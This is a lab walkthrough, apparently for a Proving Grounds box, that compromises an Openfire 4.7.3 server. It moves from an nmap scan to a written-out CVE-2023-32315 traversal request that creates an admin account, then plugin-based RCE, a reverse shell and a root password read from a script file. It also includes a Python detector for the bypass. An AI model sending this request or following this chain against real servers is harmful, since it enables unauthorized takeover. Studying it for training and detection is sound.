Information gathering:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.96
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-24 20:13 CST
Nmap scan report for 192.168.216.96
Host is up (0.0029s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:14:56 GMT
| Last-Modified: Tue, 02 Aug 2022 12:04:43 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:01 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:12 GMT
| Last-Modified: Tue, 02 Aug 2022 12:04:43 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 24 Feb 2025 12:15:12 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=localhost
| Subject Alternative Name: DNS:localhost, DNS:*.localhost
| Not valid before: 2024-06-28T07:02:39
|_Not valid after: 2029-06-27T07:02:39
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Infomir MAG-250 set-top box (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 1.92 ms 192.168.45.1
2 1.93 ms 192.168.45.254
3 2.65 ms 192.168.251.1
4 2.99 ms 192.168.216.96
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.23 seconds
Ports 9090 (HTTP) and 9091 (HTTPS) are open. Visiting 9091 shows that it is just an HTTPS reverse proxy in front of 9090, and the banner gives the version: Openfire, Version: 4.7.3.
Searching for that version turned up a vulnerability reproduction write-up: https://www.cnblogs.com/fuchangjiang/p/17713984.html
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=admin123&name=&email=&password=admin123&passwordConfirm=admin123&isadmin=on&create=Create+User HTTP/1.1
Host: 192.168.216.96:9090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: csrf=csrftoken
Sending this request creates a user with the credentials admin123/admin123.
One pitfall: the login through the browser never completes. Debugging showed that index.jsp just spins forever, and the login page redirects to index.jsp after a successful login. I worked around it by logging in with a raw request, taking the cookie from the response, adding it to the browser, and then going straight to user-summary.jsp.
At that point the admin content appeared.
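The bypass above works because the raw path starts with /setup/ (which the admin console exempts from authentication) while the %u002e%u002e segments are decoded and normalized by the container into ../.. before dispatch, so the request actually lands on user-create.jsp. The following detection routine is an added example, not code from the original post or from Openfire: it replays that decoding and normalization over constructed access-log lines and flags any request whose raw path is under /setup/ but resolves outside it. The log format and sample entries are assumptions.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format assumed); not from the original page
SAMPLE_LOG = """\
192.168.45.200 - - [24/Feb/2025:20:20:01 +0800] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=admin123 HTTP/1.1" 200 512
192.168.45.200 - - [24/Feb/2025:20:20:05 +0800] "GET /setup/index.jsp HTTP/1.1" 200 2048
192.168.45.201 - - [24/Feb/2025:20:21:10 +0800] "GET /login.jsp HTTP/1.1" 200 1800
192.168.45.202 - - [24/Feb/2025:20:22:30 +0800] "GET /setup/setup-s/../../user-summary.jsp HTTP/1.1" 200 900
"""

REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def decode_u_escapes(path):
    # Jetty accepted the non-standard %uXXXX form used in the bypass; decode it, then the usual %XX form
    path = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)

def normalize(path):
    # Collapse ./ and ../ segments the way the servlet container does before choosing a handler
    return normpath(decode_u_escapes(path))

def is_setup_bypass(raw_target):
    """True when the raw path is exempt as /setup/... but resolves to a page outside /setup/."""
    raw_path = raw_target.split('?', 1)[0]
    if not raw_path.startswith('/setup/'):
        return False
    return not normalize(raw_path).startswith('/setup/')

def find_bypass_attempts(log_text):
    """Return (client ip, method, resolved path) for every request that matches the bypass pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if m and is_setup_bypass(m['target']):
            hits.append((m['ip'], m['method'], normalize(m['target'].split('?', 1)[0])))
    return hits

if __name__ == '__main__':
    for ip, method, resolved in find_bypass_attempts(SAMPLE_LOG):
        print(f'setup auth-bypass attempt from {ip}: {method} -> {resolved}')
```

Any hit on a page such as user-create.jsp from an unauthenticated client is a strong signal; the same normalization should also be applied in a WAF rule, since matching only on the literal string ".." misses the %u-encoded form.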
Plugin upload: https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
Then visit /profile-settings.jsp and click through (clicking the topmost "server" entry did nothing for me; there is a bug where it keeps spinning).
Enter the shell with the password 123; RCE succeeds.
Got a shell (if one reverse shell command does not work, try the others one by one; it is hit and miss).
Got local.
SUID and the other routine enumeration turned up nothing, so I tried uploading iox to set up a tunnel and look at the services on those ports.
That gave no foothold either, and PwnKit (CVE-2021-4034) did not work. Then I read the hints:
don't forget to dig through the website's database!
Went into the site directory /var/lib/openfire/.
It contains log and script files.
The log holds the credential information from my login just now, and in script I found the credentials for icmp.
Tried that password, OpenFireAtEveryone, switched to root successfully, and got the proof.
Originally published on the WeChat official account EuSRC安全实验室 (EuSRC Security Lab): PG_Fired